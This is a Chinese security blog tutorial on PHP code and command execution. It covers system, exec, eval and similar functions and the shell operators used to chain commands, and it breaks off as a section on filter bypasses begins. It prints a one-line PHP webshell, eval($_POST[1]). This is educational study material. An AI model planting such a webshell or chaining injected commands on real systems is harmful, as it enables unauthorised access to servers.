<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>基础系列03-代码执行 | swedsn</title>
  <meta name="keywords" content=" Web安全 ">
  <meta name="description" content="基础系列03-代码执行 | swedsn">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="忙里偷闲，记录生活关于博客我认为搭建博客主要分为三个阶段  第一个阶段：刚开始搭建博客，觉得搭建博客很神奇，就想搭建一个完整的博客，感觉有成就感   第二个阶段：这个时候已经了解了如何搭建博客。此时就想搭建一个好看，功能丰富的博客，于是尝试了不同的框架，更换了各种各样的主题，想搭建一个自己喜欢的一个博客，同时对于博客的认为是给别人看的   第三阶段：现在的我，只想要有一个简单的博客，简单到只要方便">
<meta property="og:type" content="website">
<meta property="og:title" content="about">
<meta property="og:url" content="http://example.com/about/index.html">
<meta property="og:site_name" content="swedsn">
<meta property="og:description" content="忙里偷闲，记录生活关于博客我认为搭建博客主要分为三个阶段  第一个阶段：刚开始搭建博客，觉得搭建博客很神奇，就想搭建一个完整的博客，感觉有成就感   第二个阶段：这个时候已经了解了如何搭建博客。此时就想搭建一个好看，功能丰富的博客，于是尝试了不同的框架，更换了各种各样的主题，想搭建一个自己喜欢的一个博客，同时对于博客的认为是给别人看的   第三阶段：现在的我，只想要有一个简单的博客，简单到只要方便">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-07-20T11:44:45.000Z">
<meta property="article:modified_time" content="2022-07-20T12:14:09.781Z">
<meta property="article:author" content="swedsn">
<meta name="twitter:card" content="summary">


<link rel="icon" href="/img/logo.png">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/kimbie-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="//cdn.jsdelivr.net/npm/jquery.cookie@1.4.1/jquery.cookie.min.js" ></script>

<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 6.2.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>swedsn</span>
</div>

<div class="icon">
    
        
            <a title="github"
               href="https://github.com/swedsn?tab=repositories"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="csdn"
               href="https://blog.csdn.net/qq_51032807?spm=1000.2115.3001.5343"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-csdn"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="email"
               href="mailto:jaytp@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=1627319559&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
</div>




<ul>
    <li>
        <div class="all active" data-rel="全部文章">全部文章
            
                <small>(22)</small>
            
        </div>
    </li>
    
        
            
                <li>
                    <div data-rel="开发">
                        <i class="fold iconfont icon-right"></i>
                        
                        开发
                        <small>(2)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="开发<--->支付宝接口">
                                        
                                        支付宝接口
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="开发<--->Java开发">
                                        <i class="fold iconfont icon-right"></i>
                                        
                                        Java开发
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                        <ul class="sub hide">
                                            
                                                <li>
                                                    <div data-rel="开发<--->Java开发基础知识">
                                                        
                                                        基础知识
                                                        
                                                            <small>(1)</small>
                                                        
                                                    </div>
                                                </li>
                                            
                                        </ul>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
        
            
                <li>
                    <div data-rel="工具箱">
                        <i class="fold iconfont icon-right"></i>
                        
                        工具箱
                        <small>(2)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="工具箱<--->Misc">
                                        
                                        Misc
                                        
                                            <small>(2
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
        
    
        
            
                <li>
                    <div data-rel="Pwn入门">
                        <i class="fold iconfont icon-right"></i>
                        
                        Pwn入门
                        <small>(11)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="Pwn入门<--->格式化字符串漏洞">
                                        
                                        格式化字符串漏洞
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="Pwn入门<--->基础知识">
                                        
                                        基础知识
                                        
                                            <small>(5
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="Pwn入门<--->栈溢出">
                                        
                                        栈溢出
                                        
                                            <small>(5
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
        
            
        
    
        
            
        
    
        
            
                <li>
                    <div data-rel="Web安全">
                        <i class="fold iconfont icon-right"></i>
                        
                        Web安全
                        <small>(6)</small>
                        
                    </div>
                    
                        <ul class="sub hide">
                            
                                <li>
                                    <div data-rel="Web安全<--->代码执行">
                                        
                                        代码执行
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="Web安全<--->文件包含">
                                        
                                        文件包含
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="Web安全<--->文件上传">
                                        
                                        文件上传
                                        
                                            <small>(2
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="Web安全<--->SQL注入">
                                        
                                        SQL注入
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                                <li>
                                    <div data-rel="Web安全<--->SUID提权">
                                        
                                        SUID提权
                                        
                                            <small>(1
                                                )</small>
                                        
                                    </div>
                                    
                                </li>
                            
                        </ul>
                    
                </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
            
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">关于</a>
        
        <a style="width: 50%"
                
                                           class="friends">友链</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="22">
<input type="hidden" id="yelog_site_word_count" value="37.8k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://www.extrader.top/">陈师傅</a></li>
            
            <li><a target="_blank" href="http://ylcao.top/">曹师傅</a></li>
            
            <li><a target="_blank" href="https://twopair.cn/">李主任</a></li>
            
            <li><a target="_blank" href="https://wlaport.top/">朱主任</a></li>
            
            <li><a target="_blank" href="https://www.acking-you.xyz/">King Bo</a></li>
            
            <li><a target="_blank" href="https://www.yuque.com/salvior/">salvior</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="搜索 快捷键 i"></i>
            <div class="right-title">全部文章</div>
            <i class="iconfont icon-file-tree" data-title="切换到大纲视图 快捷键 w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="返回"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="大小写敏感"></i>
            <i class="iconfont icon-tag" data-title="标签"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">大纲</div>
            <i class="iconfont icon-list" data-title="切换到文章列表"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Web安全</a>
            </li>
        
    </div>

</div>

    
    <nav id="title-list-nav">
        
        
        <a  class="全部文章 Web安全 文件上传 "
           href="/2022/09/19/2022%E7%BE%8A%E5%9F%8E%E6%9D%AF%E4%B8%A4%E9%81%93%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%98/"
           data-tag="Web安全"
           data-author="" >
            <span class="post-title" title="2022羊城杯两道反序列化题">2022羊城杯两道反序列化题</span>
            <span class="post-date" title="2022-09-19 21:29:09">2022/09/19</span>
        </a>
        
        
        <a  class="全部文章 Web安全 文件上传 "
           href="/2022/09/19/spl-autoload-register%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"
           data-tag="Web安全"
           data-author="" >
            <span class="post-title" title="spl_autoload_register文件上传">spl_autoload_register文件上传</span>
            <span class="post-date" title="2022-09-19 21:24:04">2022/09/19</span>
        </a>
        
        
        <a  class="全部文章 Web安全 代码执行 "
           href="/2022/09/19/%E5%9F%BA%E7%A1%80%E7%B3%BB%E5%88%9703-%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C-md/"
           data-tag="Web安全"
           data-author="" >
            <span class="post-title" title="基础系列03-代码执行">基础系列03-代码执行</span>
            <span class="post-date" title="2022-09-19 21:01:40">2022/09/19</span>
        </a>
        
        
        <a  class="全部文章 Web安全 SUID提权 "
           href="/2022/09/19/SUID%E6%8F%90%E6%9D%83-md/"
           data-tag="Web安全"
           data-author="" >
            <span class="post-title" title="SUID提权.md">SUID提权.md</span>
            <span class="post-date" title="2022-09-19 21:00:53">2022/09/19</span>
        </a>
        
        
        <a  class="全部文章 Web安全 文件包含 "
           href="/2022/09/19/pearcmd-php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-md/"
           data-tag="Web安全"
           data-author="" >
            <span class="post-title" title="pearcmd.php文件包含">pearcmd.php文件包含</span>
            <span class="post-date" title="2022-09-19 20:58:10">2022/09/19</span>
        </a>
        
        
        <a  class="全部文章 Web安全 SQL注入 "
           href="/2022/07/20/SQL%E6%B3%A8%E5%85%A5%E6%80%BB%E7%BB%93/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="SQL注入总结">SQL注入总结</span>
            <span class="post-date" title="2022-07-20 19:05:32">2022/07/20</span>
        </a>
        
        
        <a  class="全部文章 工具箱 Misc "
           href="/2022/07/20/%E6%98%93%E6%A0%A1%E5%9B%AD%E8%87%AA%E5%8A%A8%E6%89%93%E5%8D%A1/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="易校园自动打卡">易校园自动打卡</span>
            <span class="post-date" title="2022-07-20 18:49:05">2022/07/20</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 格式化字符串漏洞 "
           href="/2022/07/12/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="格式化字符串漏洞学习">格式化字符串漏洞学习</span>
            <span class="post-date" title="2022-07-12 13:51:39">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 栈溢出 "
           href="/2022/07/12/%E8%8A%B1%E5%BC%8F%E6%A0%88%E6%BA%A2%E5%87%BA-%E6%A0%88%E8%BF%81%E7%A7%BB/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="花式栈溢出--栈迁移">花式栈溢出--栈迁移</span>
            <span class="post-date" title="2022-07-12 13:45:03">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 栈溢出 "
           href="/2022/07/12/%E8%8A%B1%E5%BC%8F%E6%A0%88%E6%BA%A2%E5%87%BA-%E4%B8%80%E9%94%AE%E8%8E%B7%E5%8F%96flag/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Pwn学习笔记-一键获取flag">Pwn学习笔记-一键获取flag</span>
            <span class="post-date" title="2022-07-12 13:44:56">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 栈溢出 "
           href="/2022/07/12/%E8%8A%B1%E5%BC%8F%E6%A0%88%E6%BA%A2%E5%87%BA-mprotect%E7%BB%95%E8%BF%87NX%E4%BF%9D%E6%8A%A4/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="花式栈溢出-mprotect绕过NX保护">花式栈溢出-mprotect绕过NX保护</span>
            <span class="post-date" title="2022-07-12 13:44:49">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 "
           href="/2022/07/12/Pwn%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-ret2csu/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Pwn学习笔记-ret2csu">Pwn学习笔记-ret2csu</span>
            <span class="post-date" title="2022-07-12 13:44:28">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 栈溢出 "
           href="/2022/07/12/Pwn%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-ret2libc%E6%A8%A1%E6%9D%BF/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Pwn学习笔记-ret2libc模板">Pwn学习笔记-ret2libc模板</span>
            <span class="post-date" title="2022-07-12 13:44:21">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 栈溢出 "
           href="/2022/07/12/Pwn%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E6%A0%88%E6%BA%A2%E5%87%BA%E5%9F%BA%E6%9C%AC%E5%8E%9F%E7%90%86/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Pwn学习笔记-栈溢出基本原理">Pwn学习笔记-栈溢出基本原理</span>
            <span class="post-date" title="2022-07-12 13:43:47">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 基础知识 "
           href="/2022/07/12/Pwn%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-Linux%E4%B8%8BELF%E6%96%87%E4%BB%B6%E7%9A%84%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Pwn学习笔记-Linux下ELF文件的保护机制">Pwn学习笔记-Linux下ELF文件的保护机制</span>
            <span class="post-date" title="2022-07-12 13:40:54">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 基础知识 "
           href="/2022/07/12/Pwn%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E5%88%86%E6%9E%90%E5%B7%A5%E5%85%B7/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Pwn学习笔记-分析工具">Pwn学习笔记-分析工具</span>
            <span class="post-date" title="2022-07-12 13:40:36">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 基础知识 "
           href="/2022/07/12/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%9F%BA%E7%A1%80%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="二进制基础学习">二进制基础学习</span>
            <span class="post-date" title="2022-07-12 13:40:27">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 基础知识 "
           href="/2022/07/12/Pwn%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Pwn学习笔记-环境配置">Pwn学习笔记-环境配置</span>
            <span class="post-date" title="2022-07-12 13:40:08">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 Pwn入门 基础知识 "
           href="/2022/07/12/Linux%E5%9F%BA%E7%A1%80%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Linux基础学习">Linux基础学习</span>
            <span class="post-date" title="2022-07-12 13:39:59">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 开发 支付宝接口 "
           href="/2022/07/12/%E6%94%AF%E4%BB%98%E5%AE%9D%E6%8E%A5%E5%8F%A3%E5%BC%80%E5%8F%91/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="支付宝接口开发">支付宝接口开发</span>
            <span class="post-date" title="2022-07-12 09:55:16">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 工具箱 Misc "
           href="/2022/07/12/Latex%E7%9A%84%E5%AD%A6%E4%B9%A0/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Latex的学习">Latex的学习</span>
            <span class="post-date" title="2022-07-12 09:54:45">2022/07/12</span>
        </a>
        
        
        <a  class="全部文章 开发 Java开发 基础知识 "
           href="/2022/07/12/Java%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/"
           data-tag=""
           data-author="" >
            <span class="post-title" title="Java环境配置">Java环境配置</span>
            <span class="post-date" title="2022-07-12 09:54:29">2022/07/12</span>
        </a>
        
        <div id="no-item-tips">

        </div>
    </nav>
    <div id="outline-list">
    </div>
</div>

    </div>
    <div class="hide-list">
        <div class="semicircle" data-title="切换全屏 快捷键 s">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div id="post">
    <div class="pjax">
        <article id="post-基础系列03-代码执行-md" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">基础系列03-代码执行</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            <i class="iconfont icon-category"></i>
            
            
            <a  data-rel="Web安全">Web安全</a> > 
            
            <a  data-rel="Web安全&lt;---&gt;代码执行">代码执行</a>
            
        </span>
        
        
        <span class="tag">
            <i class="iconfont icon-tag"></i>
            
            <a class="color1">Web安全</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
            发布时间 : <time class="date" title='最后更新: 2022-09-19 21:23:40'>2022-09-19 21:01</time>
        
    </div>
    <div class="article-meta">
        
        <span>字数:1.9k</span>
        
        
        <span id="busuanzi_container_page_pv">
            阅读 :<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E4%BB%80%E4%B9%88%E6%98%AF%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%B8%8E%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-text">一、什么是代码执行与命令执行</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E5%B8%B8%E8%A7%81%E5%87%BD%E6%95%B0%E6%80%BB%E7%BB%93"><span class="toc-text">二、常见函数总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E5%B8%B8%E8%A7%81%E7%9A%84%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0%E5%8F%8A%E8%BF%90%E7%AE%97%E7%AC%A6"><span class="toc-text">1、常见的命令执行函数及运算符</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E5%B8%B8%E8%A7%81%E7%9A%84%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0"><span class="toc-text">2、常见的代码执行函数</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E5%91%BD%E4%BB%A4%E8%BF%9E%E6%8E%A5%E7%AC%A6"><span class="toc-text">三、命令连接符</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81windows%E4%B8%8B%E5%B8%B8%E8%A7%81%E7%9A%84%E5%91%BD%E4%BB%A4%E8%BF%9E%E6%8E%A5%E7%AC%A6"><span class="toc-text">1、windows下常见的命令连接符</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81linux%E4%B8%8B%E5%B8%B8%E8%A7%81%E7%9A%84%E5%91%BD%E4%BB%A4%E8%BF%9E%E6%8E%A5%E7%AC%A6"><span class="toc-text">2、linux下常见的命令连接符</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81%E5%91%BD%E4%BB%A4%E8%BF%9E%E6%8E%A5%E7%AC%A6%E6%80%BB%E7%BB%93"><span class="toc-text">3、命令连接符总结</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9B%9B%E3%80%81%E5%B8%B8%E8%A7%81%E8%BF%87%E6%BB%A4%E4%BB%A5%E5%8F%8A%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F"><span class="toc-text">四、常见过滤以及绕过方式</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E7%BB%95%E8%BF%87%E8%BF%87%E6%BB%A4%E7%A9%BA%E6%A0%BC"><span class="toc-text">1、绕过过滤空格</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E7%BB%95%E8%BF%87%E8%BF%87%E6%BB%A4%E5%85%B3%E9%94%AE%E5%AD%97%E6%96%B9%E6%B3%95"><span class="toc-text">2、绕过过滤关键字方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81%E5%B8%B8%E8%A7%81%E5%85%B3%E9%94%AE%E5%AD%97%E6%9B%BF%E6%8D%A2"><span class="toc-text">3、常见关键字替换</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%E3%80%81%E8%BF%87%E6%BB%A4%E6%8B%AC%E5%8F%B7%EF%BC%88%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%BB%95%E8%BF%87%EF%BC%89"><span class="toc-text">4、过滤括号（文件包含绕过）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5%E3%80%81%E5%85%B3%E9%94%AE%E5%AD%97%E5%8F%8A%E5%85%B6%E5%AD%90%E5%85%B3%E9%94%AE%E5%AD%97%E8%BF%87%E6%BB%A4"><span class="toc-text">5、关键字及其子关键字过滤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6%E3%80%81%E8%BF%87%E6%BB%A4%E6%95%B0%E5%AD%97%E4%BB%A5%E5%8F%8A%E5%AD%97%E6%AF%8D"><span class="toc-text">6、过滤数字以及字母</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7%E3%80%81%E5%A6%82%E4%BD%95%E5%AE%9E%E7%8E%B0%E4%B8%8A%E4%BC%A0%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC"><span class="toc-text">7、如何实现上传一句话木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7%E3%80%81disable-function"><span class="toc-text">7、disable_function</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8%E3%80%81%E8%BF%87%E6%BB%A4-lt"><span class="toc-text">8、过滤&lt;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9%E3%80%81%E5%B8%B8%E8%A7%81%E7%9A%84%E5%B0%8F%E6%8A%80%E5%B7%A7"><span class="toc-text">9、常见的小技巧</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="一、什么是代码执行与命令执行"><a href="#一、什么是代码执行与命令执行" class="headerlink" title="一、什么是代码执行与命令执行"></a>一、什么是代码执行与命令执行</h1><p>1、代码执行</p>
<blockquote>
<p>代码执行就是特殊的函数能够将一些字符串当作代码一样来执行，像”phpinfo();”，它本身是字符串，但是加上特殊函数(eval等)之后就会打印出信息。php代码中本身就存在一些特殊的函数像system函数，它的作用就是执行系统命令。这样的话eval(“system(“ls”)”)；这样的话就会执行系统命令，所以说代码执行的定义相比命令执行更加大一些</p>
</blockquote>
<p>2、命令执行：</p>
<blockquote>
<p>就是Windows、Linux下面的命令，通过system等就可以执行php代码中执行</p>
</blockquote>
<h1 id="二、常见函数总结"><a href="#二、常见函数总结" class="headerlink" title="二、常见函数总结"></a>二、常见函数总结</h1><h2 id="1、常见的命令执行函数及运算符"><a href="#1、常见的命令执行函数及运算符" class="headerlink" title="1、常见的命令执行函数及运算符"></a>1、常见的命令执行函数及运算符</h2><p>（1）system函数</p>
<pre><code class="php">system(string $command, int &amp;$return_var = ?): string
</code></pre>
<ul>
<li>command表示执行的命令</li>
<li>return_var：存在则表示执行命令后的返回状态将会设置到此变量中</li>
<li>它会输出返回结果</li>
</ul>
<p>（2）exec函数与shell_exec函数</p>
<ul>
<li>作用执行系统命令</li>
<li>exec：输出结果不会返回，需要使用echo才会输出结果</li>
<li>shell_exec：通过shell环境执行命令，并且会输出完整的结果</li>
</ul>
<p>（3）反引号</p>
<p>它的作用相当于system，但是它不会返回结果，需要用echo输出出来</p>
<p>（4）除此之外还有很多函数，之后遇到再补充</p>
<ul>
<li>pssthru函数</li>
<li>popen函数</li>
<li>proc_open函数</li>
</ul>
<h2 id="2、常见的代码执行函数"><a href="#2、常见的代码执行函数" class="headerlink" title="2、常见的代码执行函数"></a>2、常见的代码执行函数</h2><p>（1）eval函数</p>
<pre><code class="php">eval(string $code)
</code></pre>
<ul>
<li>code表示要执行的php代码</li>
</ul>
<p>常见的使用eval函数的有</p>
<pre><code class="php">&lt;?ph eval($_POST[1]);?&gt;

&lt;?ph eval(system(&quot;ls&quot;));?&gt;
</code></pre>
<p>（2）assert函数</p>
<p><a target="_blank" rel="noopener" href="https://www.php.cn/php-ask-429607.html">https://www.php.cn/php-ask-429607.html</a></p>
<p>（3）除此之外还没很多函数，遇到以后再学</p>
<ul>
<li>call_user_func函数</li>
<li>call_user_func_array函数</li>
<li>create_function函数</li>
<li>array_map函数</li>
<li>preg_replace函数</li>
</ul>
<h1 id="三、命令连接符"><a href="#三、命令连接符" class="headerlink" title="三、命令连接符"></a>三、命令连接符</h1><h2 id="1、windows下常见的命令连接符"><a href="#1、windows下常见的命令连接符" class="headerlink" title="1、windows下常见的命令连接符"></a>1、windows下常见的命令连接符</h2><p>（1）&amp;命令连接符</p>
<ul>
<li>两条命令都执行，不管前面的语句是否为真</li>
</ul>
<p>（2）&amp;&amp;命令连接符</p>
<ul>
<li>&amp;&amp;前面的语句为假，直接报错，&amp;&amp;后面的也不执行</li>
<li>&amp;&amp;前面的语句为真，&amp;&amp;前后的语句都执行</li>
</ul>
<p>（3）|命令连接符</p>
<ul>
<li>|前面的语句为假，直接报错，|后面的也不执行</li>
<li>|前面的语句为真，执行|后面的语句</li>
</ul>
<p>（4）||命令连接符</p>
<ul>
<li>类似if-else语句，前面为真执行前面，否则执行后面</li>
</ul>
<h2 id="2、linux下常见的命令连接符"><a href="#2、linux下常见的命令连接符" class="headerlink" title="2、linux下常见的命令连接符"></a>2、linux下常见的命令连接符</h2><p>（1）&amp;命令连接符</p>
<ul>
<li>两条命令都执行，不管前面的语句是否为真</li>
</ul>
<p>（2）&amp;&amp;命令连接符</p>
<ul>
<li>&amp;&amp;前面的语句为假，直接报错，&amp;&amp;后面的也不执行</li>
<li>&amp;&amp;前面的语句为真，&amp;&amp;前后的语句都执行</li>
</ul>
<p>（3）|命令连接符</p>
<ul>
<li>|前面的命令的输出作为后面命令的输入，前后命令都执行但是只显示后面的命令结果</li>
</ul>
<p>（4）||命令连接符</p>
<ul>
<li>类似if-else语句，前面为真执行前面，否则执行后面</li>
</ul>
<p>（5）；命令连接符</p>
<ul>
<li>多个命令顺序执行，前后两条命令都会执行</li>
</ul>
<h2 id="3、命令连接符总结"><a href="#3、命令连接符总结" class="headerlink" title="3、命令连接符总结"></a>3、命令连接符总结</h2><p>（1）区别</p>
<blockquote>
<p>Windows与Linux的命令连接符除了|之外差不多，但是两者最终显示的都是|后面的结果。而且linux相比windows多了一条分号</p>
</blockquote>
<p>（2）作用</p>
<blockquote>
<p>命令连接符的主要作用就是分割命令，分别执行。 目前这种我所看到的主要就是程序会把输出的结果重定向到null处，所以需要使用连接符进行分割</p>
</blockquote>
<p>（3）常见命令连接符的使用</p>
<blockquote>
<p>Linux下面的分号、||、&amp;。因为这集中前面的结果都会展示</p>
</blockquote>
<h1 id="四、常见过滤以及绕过方式"><a href="#四、常见过滤以及绕过方式" class="headerlink" title="四、常见过滤以及绕过方式"></a>四、常见过滤以及绕过方式</h1><h2 id="1、绕过过滤空格"><a href="#1、绕过过滤空格" class="headerlink" title="1、绕过过滤空格"></a>1、绕过过滤空格</h2><p>（1）%09绕过</p>
